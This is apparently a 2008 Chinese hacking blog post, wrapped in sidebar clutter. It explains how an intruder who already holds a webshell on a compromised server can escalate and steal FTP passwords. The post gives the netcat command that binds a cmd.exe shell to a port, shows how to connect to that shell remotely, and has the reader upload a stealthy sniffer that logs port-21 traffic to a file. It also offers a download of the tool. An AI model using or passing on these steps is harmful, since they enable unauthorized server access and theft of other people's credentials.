1. 公告

    • 黑夜给了我黑色的眼睛去寻找光明,阳光给了我明亮的眼睛我却是去寻找黑暗,所以我只有在夜里才出现真实的自己。(菩提本不树,明镜亦非台,本来无一物,何处染尘埃。)

  2. 写作时间

    << 2008-4 >>

    Sun

    Mon

    Tue

    Wed

    Thu

    Fri

    Sat

    1

    2

    3

    4

    5

    6

    7

    8

    9

    10

    11

    12

    13

    14

    15

    16

    17

    18

    19

    20

    21

    22

    23

    24

    25

    26

    27

    28

    29

    30

  3. 原创下载

  4. 最新文章

  5. 最新评论

  6. 文章归档

  7. Statistics

    • 文章总数:154
    • 评论总数:47
    • 引用总数:0
    • 浏览总数:121178
    • 留言总数:0
    • 当前样式:4u-HK
    • 当前语言:zh-CN

  8. 友情链接

  9. 反向链接

低权限下FTP密码的嗅探

在获得了网站的webshell权限后,我们找到可以执行的目录(2000系统下 c:\winnt\system32\inetsrv\data),然后上传我们的瑞士军刀——NC。在webshell中执行命令nc.exe -l -p 1000 -e cmd.exe。然后本机运行nc.exe *.*.*.* 1000 得到对方的CMDshell。再上传我们的sniff.exe工具。在webshell里运行 sniff.exe 127.0.0.1 21 便可以隐蔽在当前目录下对21端口进行嗅探了。嗅探的结果会在当前目录下生成一个名称为log.log的文件。使用type命令就可以打开显示里面的内容。

  说明:sniff是一个可以隐藏本地监听端口的,不需要装驱动的优秀本地端口嗅探工具。在入侵嗅探中有比较出色的表现!下载文件 点击下载此文件

您或许还对以下的内容感兴趣:

如果您拥有一个BLOG,如果您的BLOG的PV/IP/PR还算不错,如果您打算用您所拥有的BLOG来赚钱,那么我来告诉您几个赚钱的方法:

1、透过 Google AdSense 使您的BLOG产生收益

2、您还可以通过申请TextLinkAds投放者来直接出售链接位从而产生收入。